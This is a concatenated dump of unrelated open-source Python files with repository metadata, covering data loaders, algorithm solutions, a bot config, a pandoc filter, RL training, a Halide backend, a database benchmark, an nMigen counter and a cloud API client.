data = IDGAN(root=dataset_dir, syn=self.syn, transform=self.train_transform)
self.train_data, self.val_data = split_dataset(data, 0.8, self.seed)
if stage == "test" or stage is None:
self.test_data = IDGAN(root=dataset_dir, syn=self.syn, split="test", transform=self.valid_transform)
def get_train_valid_loader(
train_data,
valid_data,
batch_size=4,
valid_size=0.1,
show_sample=False,
num_workers=NUM_WORKERS,
pin_memory=False,
shuffle=True,
seed=SEED,
):
error_msg = "[!] valid_size should be in the range [0, 1]."
assert (valid_size >= 0) and (valid_size <= 1), error_msg
num_train = len(train_data)
indices = list(range(num_train))
split = int(np.floor(valid_size * num_train))
if shuffle:
np.random.seed(seed)
np.random.shuffle(indices)
train_idx, valid_idx = indices[split:], indices[:split]
train_dataset = torch.utils.data.Subset(train_data, train_idx)
valid_dataset = torch.utils.data.Subset(valid_data, valid_idx)
train_loader = DataLoader(
train_dataset,
batch_size=batch_size,
num_workers=num_workers,
pin_memory=pin_memory,
)
valid_loader = DataLoader(
valid_dataset,
batch_size=batch_size,
num_workers=num_workers,
pin_memory=pin_memory,
)
print("Training Batches: ", len(train_loader))
print("Validation Batches: ", len(valid_loader))
# visualize some images
if show_sample:
x, y, z = next(iter(train_loader))
show_images(torch.cat((x, y, z)))
x, y, z = next(iter(valid_loader))
show_images(torch.cat((x, y, z)))
return train_loader, valid_loader
def get_test_loader(test_data, batch_size=1, shuffle=False, num_workers=NUM_WORKERS, pin_memory=False):
test_loader = DataLoader(
test_data,
batch_size=batch_size,
num_workers=num_workers,
shuffle=shuffle,
pin_memory=pin_memory,
)
print("Testing Batches: ", len(test_loader))
return test_loader
| 33.300518 | 119 | 0.628131 | 9,365 | 0.728567 | 0 | 0 | 0 | 0 | 0 | 0 | 1,245 | 0.096857 |
9505115c9cbc7843483152234defea7c4da55e5d
| 663 |
py
|
Python
|
29_Tree/Step03/wowo0709.py
|
StudyForCoding/BEAKJOON
|
84e1c5e463255e919ccf6b6a782978c205420dbf
|
[
"MIT"
] | null | null | null |
29_Tree/Step03/wowo0709.py
|
StudyForCoding/BEAKJOON
|
84e1c5e463255e919ccf6b6a782978c205420dbf
|
[
"MIT"
] | 3 |
2020-11-04T05:38:53.000Z
|
2021-03-02T02:15:19.000Z
|
29_Tree/Step03/wowo0709.py
|
StudyForCoding/BEAKJOON
|
84e1c5e463255e919ccf6b6a782978c205420dbf
|
[
"MIT"
] | null | null | null |
import sys
input = sys.stdin.readline
from collections import deque
def bfs(v):
dp = [-1 for _ in range(V+1)]
dp[v] = 0
q = deque()
q.append(v)
while q:
cv = q.popleft()
for nc,nv in tree[cv]:
if dp[nv] == -1: # 아직 들르지 않았다면,
dp[nv] = dp[cv] + nc
q.append(nv)
return dp
# main
V = int(input())
tree = [[] for _ in range(V+1)]
# 1167번과 입력 형태만 다름
for _ in range(V-1):
a,b,c = map(int,input().split())
tree[a].append((c,b))
tree[b].append((c,a))
ds = bfs(1) # 임의의 정점으로부터의 거리 계산
v = ds.index(max(ds)) # 거리가 최대인 정점을 찾음
print(max(bfs(v))) # 찾은 정점으로부터의 최대 거리 계산
| 24.555556 | 43 | 0.517345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 210 | 0.269576 |
9506269afc0618a55f2884b0a52f8b3902a5b1f4
| 997 |
py
|
Python
|
config.py
|
anvme/TONTgContractBot
|
e5fa48d262faec26e2835daa6db764867a369672
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
anvme/TONTgContractBot
|
e5fa48d262faec26e2835daa6db764867a369672
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
anvme/TONTgContractBot
|
e5fa48d262faec26e2835daa6db764867a369672
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ##### TONTgBotContract Config
# Edit starts here
TgBotAPIKey = 'xxxx:yyyy' # API Keythat you get from @BotFather
tg = 11111 # Your id, you can get it by sending command /id to bot @TONTgIDBot
# Edit ends here
tonoscli = '/opt/tonos-cli/target/release/tonos-cli' # Path to tonos-cli
solccompiler = '/opt/ton-solidity-compiler/compiler/build/solc/solc'
tvmlinker = '/opt/ton-tvm-linker/tvm_linker/target/debug/tvm_linker'
compiler = '/opt/tontgbotcontract/data/compiler/' # Path to compiler
tvc = '/opt/tontgbotcontract/data/tvc/' # Path to tvc
sol = '/opt/tontgbotcontract/data/sol/' # Path to sol
keys = '/opt/tontgbotcontract/data/keys/' # Path to keys
tcurl = 'https://net.ton.dev' # tonos-cli net network
gruntabi = "/opt/tontgbotcontract/data/Grunt.abi"
##########
tontgcpath = '/opt/tontgbotcontract' # Folder with this bot.
tontgcpathdb = '/opt/tontgbotcontract/db' # Folder with bot database.
# ##### /TONTgBotContract Config
| 32.16129 | 78 | 0.713139 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 814 | 0.816449 |
95086bdd5bed5808e0d9ba240d94e656c6d84fab
| 1,624 |
py
|
Python
|
_scripts/pandoc_wiki_filter.py
|
BenjaminPollak/coursebook
|
4646102b5f4c3d283885ba1b221da71a5e509eeb
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | null | null | null |
_scripts/pandoc_wiki_filter.py
|
BenjaminPollak/coursebook
|
4646102b5f4c3d283885ba1b221da71a5e509eeb
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | null | null | null |
_scripts/pandoc_wiki_filter.py
|
BenjaminPollak/coursebook
|
4646102b5f4c3d283885ba1b221da71a5e509eeb
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | null | null | null |
#!/usr/bin/env python3
"""
Pandoc filter to change each relative URL to absolute
"""
from panflute import run_filter, Str, Header, Image, Math, Link, RawInline
import sys
import re
base_raw_url = 'https://raw.githubusercontent.com/illinois-cs241/coursebook/master/'
class NoAltTagException(Exception):
pass
def change_base_url(elem, doc):
if type(elem) == Image:
# Get the number of chars for the alt tag
alt_length = len(elem._content)
# No alt means no compile
# Accessibility by default
if alt_length == 0:
raise NoAltTagException(elem.url)
# Otherwise link to the raw user link instead of relative
# That way the wiki and the site will have valid links automagically
elem.url = base_raw_url + elem.url
return elem
if isinstance(elem, Math):
# Raw inline mathlinks so jekyll renders them
content = elem.text
escaped = "$$ {} $$".format(content)
return RawInline(escaped)
if isinstance(elem, Link):
# Transform all Links into a tags
# Reason being is github and jekyll are weird
# About leaving html as is and markdown as parsing
# So we change everything to avoid ambiguity
# There is a script injection possibility here so be careful
url = elem.url
title = str(elem.title)
if title == "":
title = elem.url
link = '<a href="{}">{}</a>'.format(url, title)
return RawInline(link)
def main(doc=None):
return run_filter(change_base_url, doc=doc)
if __name__ == "__main__":
main()
| 28.491228 | 84 | 0.640394 | 44 | 0.027094 | 0 | 0 | 0 | 0 | 0 | 0 | 689 | 0.424261 |
9508ac69c9c25e71d33441ccd8a681ec504ce33e
| 8,793 |
py
|
Python
|
PA_multiagent_game/multiagent_utils.py
|
salesforce/RIRL
|
6f137955bfbe2054be18bb2b15d0e6aedb972b06
|
[
"BSD-3-Clause"
] | null | null | null |
PA_multiagent_game/multiagent_utils.py
|
salesforce/RIRL
|
6f137955bfbe2054be18bb2b15d0e6aedb972b06
|
[
"BSD-3-Clause"
] | null | null | null |
PA_multiagent_game/multiagent_utils.py
|
salesforce/RIRL
|
6f137955bfbe2054be18bb2b15d0e6aedb972b06
|
[
"BSD-3-Clause"
] | null | null | null |
#
# Copyright (c) 2022, salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
import sys
import glob
sys.path.insert(0, '..')
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import tqdm
import torch
from torch.distributions import Categorical
from IPython import display
from agents.soft_q import SoftQAgent
from multi_channel_RI import MCCPERDPAgent
######### General #######################################################
def smooth_plot(values, window = 100):
assert window >= 1
n = len(values)
if n < 2:
return values
elif n < window:
window = int(np.floor(n/2))
else:
window = int(window)
cs_values = np.cumsum(values)
smooth_values = (cs_values[window:] - cs_values[:-window]) / window
smooth_xs = np.arange(len(smooth_values)) + (window/2)
return smooth_xs, smooth_values
##### Training Function ##########################################################
def train(principal_pol, agent_pol, env, n_iters=500, hist=None, train_principal=True, train_agent=True,
normalize_t=False, normalize_n_a=False, plot = True, **kwargs):
#train_principal and train_agent arguments used if want to stagger training
assert isinstance(principal_pol, MCCPERDPAgent)
if isinstance(agent_pol, SoftQAgent):
agent_arch_type = 'SQA'
elif isinstance(agent_pol, MCCPERDPAgent):
agent_arch_type = 'RIA'
else:
raise NotImplementedError("Agent type not implemented")
n_agents = env.n_agents
# horizon = env.horizon
# only add things to history if we are training both the principal and agent
if train_principal and train_agent:
if hist is None:
hist = {'r_a': [], 'r_p': [], 'ext_r_a': [], 'ext_r_p': [], 'mi': [], 'ep_r_a': [], 'ep_r_p':[], 'ext_ep_r_a':[], 'ext_ep_r_p':[]}
iter_vals = range(n_iters)
if not plot:
iter_vals = tqdm.tqdm(iter_vals)
for _ in iter_vals:
p_state = env.reset()
horizon = env.horizon
a_states = None
r_a = None
a_actions = None
done = False
# Principal and Agent Rewards
rs_seq_a = []
rs_seq_p = []
# Principal and Agent EXTRINSIC Rewards
ext_rs_seq_a = []
ext_rs_seq_p = []
principal_pol.new_episode()
agent_pol.new_episode()
while not done:
# Step the principal policy
p_actions, total_p_mi_costs = principal_pol.act(p_state)
next_a_states = env.principal_step(p_actions)
# Store stuff in the agent buffer, if appropriate
if train_agent:
if (a_states is not None) and (agent_arch_type == 'SQA'):
agent_pol.batch_add_experience(a_states, a_actions, r_a,
next_a_state=next_a_states, done=False)
a_states = next_a_states
# Step the agent policy
if (agent_arch_type == 'SQA'):
_, a_actions = agent_pol.act(a_states)
a_actions = a_actions.detach().numpy()
total_a_mi_costs = 0
else:
a_actions, total_a_mi_costs = agent_pol.act(a_states)
(r_as, r_p, r_a), p_state, done = env.agent_step(a_actions)
#r_as is a 2d array of rewards [agent1 rewards, agent2 rewards,... agentn rewards], while r_a is one long array of length batch_size * n_agents. r_a = np.concatenate(r_as) and r_as = r_a.reshape(n_agents, batch_size).T
ext_r_a = np.array(r_a)
ext_r_p = np.array(r_p)
# Add mi costs
r_a -= total_a_mi_costs
r_p -= total_p_mi_costs
#Normalize if applicable
if normalize_t:
r_a = r_a / env.horizon
r_p = r_p / env.horizon
ext_r_a = ext_r_a / env.horizon
ext_r_p = ext_r_p / env.horizon
if normalize_n_a:
r_p = r_p / float(n_agents)
ext_r_p = ext_r_p / float(n_agents)
# Accumulate rewards
rs_seq_a.append(r_a)
rs_seq_p.append(r_p)
ext_rs_seq_a.append(ext_r_a)
ext_rs_seq_p.append(ext_r_p)
# The game just ended, so we need to...
#### TRAIN AGENT ####
if train_agent:
if agent_arch_type == 'SQA':
agent_pol.batch_add_experience(a_states, a_actions, r_a,
next_a_state=None,
done=True)
_ = agent_pol.train()
else:
_ = agent_pol.end_episode(rs_seq_a)
#### TRAIN PRINCIPAL ####
if train_principal:
_ = principal_pol.end_episode(rs_seq_p)
# Log things for visualization
if train_principal and train_agent:
avg_rs_a = np.stack(rs_seq_a).mean(1)
hist['r_a'].append(avg_rs_a)
avg_rs_p = np.stack(rs_seq_p).mean(1)
hist['r_p'].append(avg_rs_p)
avg_ext_rs_a = np.stack(ext_rs_seq_a).mean(1)
hist['ext_r_a'].append(avg_ext_rs_a)
avg_ext_rs_p = np.stack(ext_rs_seq_p).mean(1)
hist['ext_r_p'].append(avg_ext_rs_p)
hist['ep_r_a'].append(np.sum(avg_rs_a ))
hist['ep_r_p'].append(np.sum(avg_rs_p))
hist['ext_ep_r_a'].append(np.sum(avg_ext_rs_a))
hist['ext_ep_r_p'].append(np.sum(avg_ext_rs_p))
channel_mis = principal_pol.get_mis_channels()
for channel_name, mi_val in channel_mis:
if channel_name not in hist:
hist[channel_name] = {}
if env.horizon not in hist[channel_name]:
hist[channel_name][env.horizon] = []
hist[channel_name][env.horizon].append(mi_val)
return hist
##### Plotting the History ##########################################################
def plot_hist_signaling_vary_h(hist, axes=None, plot_smoothed_only = False):
matplotlib.rcParams['image.aspect'] = 'auto'
matplotlib.rcParams['image.interpolation'] = 'none'
if axes is None:
_, axes = plt.subplots(2, 4, figsize=(16, 8))
(ax0, ax1, ax2, ax3) = axes[0]
(ax4, ax5, ax6, ax7) = axes[1]
for subax in axes:
for ax in subax:
ax.cla()
total_ra = hist['ep_r_a']
total_rp = hist['ep_r_p']
total_ext_ra = hist['ext_ep_r_a']
total_ext_rp = hist['ext_ep_r_p']
if not plot_smoothed_only:
ax0.plot(total_ra, color='b', alpha=0.2)
ax0.plot(total_ext_ra, color='r', alpha=0.2)
ax0.plot(*smooth_plot(total_ra, window=100), color='b')
ax0.plot(*smooth_plot(total_ext_ra, window=100), color='r')
ax0.grid(b=True)
if not plot_smoothed_only:
ax4.plot(total_rp, color='b', alpha=0.2)
ax4.plot(total_ext_rp, color='r', alpha=0.2)
ax4.plot(*smooth_plot(total_rp, window=100), color='b')
ax4.plot(*smooth_plot(total_ext_rp, window=100), color='r')
ax4.grid(b=True)
max_h = max(hist['mi-last_effort'].keys())
min_h = min(hist['mi-last_effort'].keys())
ax1.imshow(np.array(hist['mi-last_effort'][min_h]), vmin=0, vmax=2.5)
ax2.imshow(np.array(hist['mi-last_individual_outputs'][min_h]), vmin=0, vmax=2.5)
ax3.imshow(np.array(hist['mi-last_wage_hours_output_time'][min_h]), vmin=0, vmax=2.5)
ax0.set_title('Agent Reward')
ax4.set_title('Principal Reward (includes MI cost)')
ax1.set_title(f'MI: Effort {min_h}')
ax2.set_title(f'MI: Individual Outputs {min_h}')
ax3.set_title(f'MI: Others {min_h}')
ax5.imshow(np.array(hist['mi-last_effort'][max_h]), vmin=0, vmax=2.5)
ax6.imshow(np.array(hist['mi-last_individual_outputs'][max_h]), vmin=0, vmax=2.5)
ax7.imshow(np.array(hist['mi-last_wage_hours_output_time'][max_h]), vmin=0, vmax=2.5)
ax5.set_title(f'MI: Effort {max_h}')
ax6.set_title(f'MI: Individual Outputs {max_h}')
ax7.set_title(f'MI: Others {max_h}')
# ###### Function for naming savefiles #########################################
def get_savestr_allh(folder, principal_effort_mi_cost, principal_output_mi_cost, normalize_t, *args, **kwargs):
effort_name = f'mipe{principal_effort_mi_cost:.2f}'
output_name = f'mipe{principal_output_mi_cost:.2f}'
normalize_name = f'nt{int(normalize_t)}'
return f'{folder}/{effort_name}_{normalize_name}_{output_name}'
| 35.313253 | 230 | 0.585579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,117 | 0.24076 |
950a7c06be019526c5d13e887a482057df6c98cd
| 758 |
py
|
Python
|
UVa Online Judge/v128/12808.py
|
mjenrungrot/algorithm
|
e0e8174eb133ba20931c2c7f5c67732e4cb2b703
|
[
"MIT"
] | 1 |
2021-12-08T08:58:43.000Z
|
2021-12-08T08:58:43.000Z
|
UVa Online Judge/v128/12808.py
|
mjenrungrot/algorithm
|
e0e8174eb133ba20931c2c7f5c67732e4cb2b703
|
[
"MIT"
] | null | null | null |
UVa Online Judge/v128/12808.py
|
mjenrungrot/algorithm
|
e0e8174eb133ba20931c2c7f5c67732e4cb2b703
|
[
"MIT"
] | null | null | null |
# =============================================================================
# Author: Teerapat Jenrungrot - https://github.com/mjenrungrot/
# FileName: 12808.py
# Description: UVa Online Judge - 12808
# =============================================================================
import math
def run():
line = input()
L, D, H, V = list(map(float, line.split()))
t = math.sqrt(2.0 * (H / 1000.0) / 9.81)
x = (V / 1000.0) * t
if x < D / 1000.0 - 0.5 or x > (D + L) / 1000.0 + 0.5:
print("FLOOR")
elif x <= D / 1000.0 + 0.5 or x >= (D + L) / 1000.0 - 0.5:
print("EDGE")
else:
print("POOL")
if __name__ == "__main__":
T = int(input())
for i in range(T):
run()
| 27.071429 | 79 | 0.387863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 332 | 0.437995 |
950ac99a04713eeb0672575cefd8c1ec3997841b
| 4,377 |
py
|
Python
|
cnn_implementer/backends/halide.py
|
lwaeijen/cnn-mapping-tool
|
a41c2dccb820f6227ddb6d75af9213e187744826
|
[
"MIT"
] | null | null | null |
cnn_implementer/backends/halide.py
|
lwaeijen/cnn-mapping-tool
|
a41c2dccb820f6227ddb6d75af9213e187744826
|
[
"MIT"
] | null | null | null |
cnn_implementer/backends/halide.py
|
lwaeijen/cnn-mapping-tool
|
a41c2dccb820f6227ddb6d75af9213e187744826
|
[
"MIT"
] | null | null | null |
import os
import jinja2
import networkx as nx
from ..utils import Logger
from math import ceil, floor
from ..model import Segment
#Add function to Segments that generates unique names for internal nodes
#Function is specific for halide backend, hence it is added here and not in the original definition of Segment
def halide_name(self, layer_name):
def sanitize(s):
return s.replace('/','_')
#if not on of our nodes, don't rename
if layer_name not in self.nodes():
return sanitize(layer_name)
#if an output, don't rename
if layer_name in self.produces:
return sanitize(layer_name)
# This is an internal node, there might be other segments with similar named layers
# return a name with the segment id added
return sanitize(layer_name+'_seg'+str(self.id))
Segment.halide_name=halide_name
class Halide(Logger):
def __init__(self, **kwargs):
#init super
super(Halide, self).__init__(**kwargs)
self.template_dir=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')
self.main_template='main.c.j2'
def implement(self, network, networkConfig, DEBUG=False, PROFILING=False, TRACING=False):
self.network = network
#contains the filenames of the binaries
self.params = self.network.weights
#sanity check
assert(self.params and "Can not implement a network if the weights are not specified!")
#convert config segments to real segments
segments=[]
inputs=0
info_msg=['Halide Backend implementing the selected segments:']
for segment_cfg in networkConfig.sorted_segments(self.network):
#Init segment with required layers
segment = Segment(network=network, layers=segment_cfg.layers)
#convert to old-style tuple
segments+=[(segment, segment_cfg)]
#some extra bookkeeping
for layer in segment.get_nodes():
if layer['type'] in ['input']:
inputs+=1
#tell the user what we are up to
info_msg+=[' - '+str(segment)]
self.info('\n'.join(info_msg))
#render main code
code = self.render({
'segments': segments,
'number_inputs': inputs,
'debug': DEBUG,
'PROFILING': PROFILING,
'TRACING': TRACING,
})
#return dictionary with filenames
return code
def render(self, context):
#helper function to translate internal model dimensions to halide backend dimensions
def rename(dim):
rt = {
'x': 'n',
'y': 'm',
'zo': 'o',
'zi': 'i',
'x_i': 'n_i',
'y_i': 'm_i',
'zo_i': 'o_i',
'zi_i': 'i_i',
'x_o': 'n_o',
'y_o': 'm_o',
'zo_o': 'o_o',
'zi_o': 'i_o',
}
assert(dim in rt and "Error: unknown dimension, check your config file and also make sure it is analysed to ensure proper compute levels are defined")
return rt[dim]
def rename_order(order, postfix='', exclude=[]):
return [ rename(dim)+postfix for dim in order if rename(dim)[0] not in exclude]
def jinja_debug(text):
print 'Halide Backend Template Debug:', text
return
#context to pass to jinja
ctxt={
'nx': nx,
'network': self.network,
'rename': rename,
'rename_order': rename_order,
'len': len,
'type': type,
'range': range,
'enumerate': enumerate,
'max': max,
'min': min,
'params': self.params,
'map': map,
'str': str,
'int': int,
'float': float,
'floor': floor,
'ceil': ceil,
'list': list,
}
ctxt.update(context)
#set the environment
env=jinja2.Environment(
loader=jinja2.FileSystemLoader(self.template_dir)
)
#add filter
env.filters['dbg']=jinja_debug
#load template and render
return env.get_template(self.main_template).render(ctxt)
| 31.042553 | 162 | 0.558145 | 3,527 | 0.805803 | 0 | 0 | 0 | 0 | 0 | 0 | 1,429 | 0.326479 |
950b9bd680855e1bc01f2dffb96d063d03df4633
| 137 |
py
|
Python
|
plasmapy/utils/pytest_helpers/__init__.py
|
seanjunheng2/PlasmaPy
|
7b4e4aaf8b03d88b654456bca881329ade09e377
|
[
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | 429 |
2016-10-31T19:40:32.000Z
|
2022-03-25T12:27:11.000Z
|
plasmapy/utils/pytest_helpers/__init__.py
|
RAJAGOPALAN-GANGADHARAN/PlasmaPy
|
6df9583cc47375687a07300c0aa11ba31634d770
|
[
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | 1,400 |
2015-11-24T23:00:44.000Z
|
2022-03-30T21:03:25.000Z
|
plasmapy/utils/pytest_helpers/__init__.py
|
RAJAGOPALAN-GANGADHARAN/PlasmaPy
|
6df9583cc47375687a07300c0aa11ba31634d770
|
[
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | 289 |
2015-11-24T18:54:57.000Z
|
2022-03-18T17:26:59.000Z
|
from plasmapy.utils.pytest_helpers.pytest_helpers import (
assert_can_handle_nparray,
run_test,
run_test_equivalent_calls,
)
| 22.833333 | 58 | 0.79562 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
950c169f450a431d53eeadbbe5cd4c9bc80dac22
| 664 |
py
|
Python
|
code/Attack/ParameterTypes/Types.py
|
TomasMadeja/ID2T
|
77f51c074d1ff83c7d648ae62ecaed3e5cfde80c
|
[
"MIT"
] | 33 |
2018-11-21T12:50:52.000Z
|
2022-01-12T05:38:12.000Z
|
code/Attack/ParameterTypes/Types.py
|
TomasMadeja/ID2T
|
77f51c074d1ff83c7d648ae62ecaed3e5cfde80c
|
[
"MIT"
] | 108 |
2018-11-21T12:33:47.000Z
|
2022-02-09T15:56:59.000Z
|
code/Attack/ParameterTypes/Types.py
|
TomasMadeja/ID2T
|
77f51c074d1ff83c7d648ae62ecaed3e5cfde80c
|
[
"MIT"
] | 20 |
2018-11-22T13:03:20.000Z
|
2022-01-12T00:19:28.000Z
|
import enum
class ParameterTypes(enum.Enum):
"""
Defines types for parameters. These types may be used in the specification of allowed parameters within the
individual attack classes. The type is used to verify the validity of the given value.
"""
TYPE_IP_ADDRESS = 0
TYPE_MAC_ADDRESS = 1
TYPE_PORT = 2
TYPE_INTEGER_POSITIVE = 3
TYPE_TIMESTAMP = 4
TYPE_BOOLEAN = 5
TYPE_FLOAT = 6
TYPE_PACKET_POSITION = 7 # used to derive timestamp from parameter INJECT_AFTER_PACKET
TYPE_DOMAIN = 8
TYPE_STRING = 9
TYPE_FILEPATH = 10
TYPE_PERCENTAGE = 11
TYPE_PADDING = 12
TYPE_INTERVAL_SELECT_STRAT = 13
| 28.869565 | 111 | 0.712349 | 649 | 0.97741 | 0 | 0 | 0 | 0 | 0 | 0 | 275 | 0.414157 |
950c84ecd7d7ee95d6bf316b3a497327243be4e4
| 1,984 |
py
|
Python
|
utils/error_handlrer.py
|
RobinPaspuel/YtechCode
|
219a8492aa5be76c445f3d70f8b2ef74e81c188e
|
[
"MIT"
] | null | null | null |
utils/error_handlrer.py
|
RobinPaspuel/YtechCode
|
219a8492aa5be76c445f3d70f8b2ef74e81c188e
|
[
"MIT"
] | null | null | null |
utils/error_handlrer.py
|
RobinPaspuel/YtechCode
|
219a8492aa5be76c445f3d70f8b2ef74e81c188e
|
[
"MIT"
] | null | null | null |
from utils.error_with_arrows import *
##### ERRORS ########
class Error:
def __init__(self, initial_pos, final_pos, error_class, details):
self.initial_pos = initial_pos
self.final_pos = final_pos
self.error_class= error_class
self.details= details
def error_string(self):
result = f'{self.error_class}: {self.details}'
result += f'File {self.initial_pos.filename} at line: {self.initial_pos.line + 1}'
result += '\n\n' + string_with_arrows(self.initial_pos.filetext, self.initial_pos, self.final_pos)
return result
class IllegalCharacter(Error):
def __init__(self,initial_pos, final_pos, details):
super().__init__(initial_pos, final_pos, 'Illegal Character', details)
class ExpectedCharacterError(Error):
def __init__(self,initial_pos, final_pos, details):
super().__init__(initial_pos, final_pos, 'Expected Character', details)
class InvalidSyntax(Error):
def __init__(self,initial_pos, final_pos, details = ''):
super().__init__(initial_pos, final_pos, 'Invalid Syntax', details)
class RunTimeError(Error):
def __init__(self, initial_pos, final_pos, details, context):
super().__init__(initial_pos, final_pos, 'Runtime Error', details)
self.context = context
def error_string(self):
result = self.generate_traceback()
result += f'{self.error_class}: {self.details}\n'
result += '\n\n' + string_with_arrows(self.initial_pos.filetext, self.initial_pos, self.final_pos)
return result
def generate_traceback(self):
result = ''
pos = self.initial_pos
ctx = self.context
while ctx:
result = f' File {pos.filename}, line {str(pos.line + 1)}, in {ctx.context_name}\n' + result
pos = ctx.context_parent_entry_pos
ctx = ctx.context_parent
return 'Traceback (most recent call last):\n' + result
##################################
| 40.489796 | 106 | 0.655242 | 1,880 | 0.947581 | 0 | 0 | 0 | 0 | 0 | 0 | 402 | 0.202621 |
950dcd67a7917370bcc5ec2201e9aaf688e1aa85
| 2,062 |
py
|
Python
|
postgres/python-asyncio/main.py
|
Gelbpunkt/idlebench
|
fe370f9fa6335cf738a91ca818638aedf0cf1ba3
|
[
"Apache-2.0"
] | null | null | null |
postgres/python-asyncio/main.py
|
Gelbpunkt/idlebench
|
fe370f9fa6335cf738a91ca818638aedf0cf1ba3
|
[
"Apache-2.0"
] | null | null | null |
postgres/python-asyncio/main.py
|
Gelbpunkt/idlebench
|
fe370f9fa6335cf738a91ca818638aedf0cf1ba3
|
[
"Apache-2.0"
] | 4 |
2020-08-16T22:23:42.000Z
|
2020-08-17T20:15:33.000Z
|
import asyncio
import asyncpg
VALUES = [
356091260429402122,
"Why are you reading",
9164,
6000000,
14,
0,
0,
0,
463318425901596672,
"https://i.imgur.com/LRV2QCK.png",
15306,
["Paragon", "White Sorcerer"],
0,
0,
647,
"Leader",
None,
0,
"10.0",
"10.0",
30,
2,
1,
0,
0,
"1.0",
None,
0,
"Elf",
2,
2,
0,
0,
0,
{"red": 255, "green": 255, "blue": 255, "alpha": 0.8},
]
VALUES_100 = [VALUES for _ in range(100)]
async def main():
conn = await asyncpg.connect(
user="postgres", password="postgres", database="postgres", host="127.0.0.1"
)
for i in range(1_000):
await conn.executemany(
'INSERT INTO public.profile ("user", "name", "money", "xp", "pvpwins",'
' "money_booster", "time_booster", "luck_booster", "marriage",'
' "background", "guild", "class", "deaths", "completed", "lovescore",'
' "guildrank", "backgrounds", "puzzles", "atkmultiply", "defmultiply",'
' "crates_common", "crates_uncommon", "crates_rare", "crates_magic",'
' "crates_legendary", "luck", "god", "favor", "race", "cv", "reset_points",'
' "chocolates", "trickortreat", "eastereggs", "colour") VALUES ($1, $2, $3,'
" $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15, $16, $17, $18, $19,"
" $20, $21, $22, $23, $24, $25, $26, $27, $28, $29, $30, $31, $32, $33,"
" $34, $35);",
VALUES_100,
)
await conn.fetchrow(
'SELECT * FROM public.profile WHERE "user"=356091260429402122;'
)
await conn.execute(
'UPDATE public.profile SET "crates_common"="crates_common"+1,'
' "crates_uncommon"="crates_uncommon"+1 WHERE "user"=$1;',
356091260429402122,
)
await conn.execute(
'DELETE FROM public.profile WHERE "user"=356091260429402122;'
)
await conn.close()
asyncio.run(main())
| 25.45679 | 88 | 0.511639 | 0 | 0 | 0 | 0 | 0 | 0 | 1,490 | 0.722599 | 1,075 | 0.521339 |
950e90e9549308bcb8380f5876c0fc12c6f68485
| 1,112 |
py
|
Python
|
fv-courseware/exercise-01/counter_formal.py
|
DonaldKellett/nmigen-beginner
|
260ae76a5277e36ec9909aaf6b76acab320aed88
|
[
"MIT"
] | 1 |
2020-11-09T13:34:02.000Z
|
2020-11-09T13:34:02.000Z
|
fv-courseware/exercise-01/counter_formal.py
|
DonaldKellett/nmigen-beginner
|
260ae76a5277e36ec9909aaf6b76acab320aed88
|
[
"MIT"
] | null | null | null |
fv-courseware/exercise-01/counter_formal.py
|
DonaldKellett/nmigen-beginner
|
260ae76a5277e36ec9909aaf6b76acab320aed88
|
[
"MIT"
] | null | null | null |
from nmigen import *
from nmigen.asserts import Assert
from nmigen.cli import main_parser, main_runner
__all__ = ["Counter"]
"""
Simple counter with formal verification
See slides 50-60 in
https://zipcpu.com/tutorial/class-verilog.pdf
"""
class Counter(Elaboratable):
def __init__(self, fv_mode = False):
self.fv_mode = fv_mode
self.i_start_signal = Signal(1, reset=0)
self.counter = Signal(16)
self.o_busy = Signal(1, reset=0)
def ports(self):
return [
self.i_start_signal,
self.counter,
self.o_busy
]
def elaborate(self, platform):
m = Module()
MAX_AMOUNT = Const(22)
with m.If(self.i_start_signal & (self.counter == 0)):
m.d.sync += self.counter.eq(MAX_AMOUNT - 1)
with m.Elif(self.counter != 0):
m.d.sync += self.counter.eq(self.counter - 1)
m.d.comb += self.o_busy.eq(self.counter != 0)
if self.fv_mode:
m.d.comb += Assert(self.counter < MAX_AMOUNT)
return m
if __name__ == "__main__":
parser = main_parser()
args = parser.parse_args()
m = Module()
m.submodules.counter = counter = Counter(True)
main_runner(parser, args, m, ports = counter.ports())
| 25.272727 | 55 | 0.695144 | 671 | 0.603417 | 0 | 0 | 0 | 0 | 0 | 0 | 132 | 0.118705 |
951023fa012fa8c9f93693ace80f46cf9b0de998
| 10,524 |
py
|
Python
|
regru_cloudapi/__init__.py
|
plvskiy/regru_cloudapi
|
e137a391f67b116f51b77b8e33755f8a6c3b170d
|
[
"MIT"
] | 1 |
2021-03-07T14:25:59.000Z
|
2021-03-07T14:25:59.000Z
|
regru_cloudapi/__init__.py
|
plvskiy/regru_cloudapi
|
e137a391f67b116f51b77b8e33755f8a6c3b170d
|
[
"MIT"
] | null | null | null |
regru_cloudapi/__init__.py
|
plvskiy/regru_cloudapi
|
e137a391f67b116f51b77b8e33755f8a6c3b170d
|
[
"MIT"
] | null | null | null |
import json
import requests
from regru_cloudapi.utils import Errors
class CloudAPI(object):
def __init__(self, token=None):
self.token = token
self.api_url = 'https://api.cloudvps.reg.ru/v1'
self.HEADERS = {'Content-Type': 'application/json'}
if self.token is not None:
self.HEADERS['Authorization'] = f'Bearer {self.token}'
def get_tariffs(self):
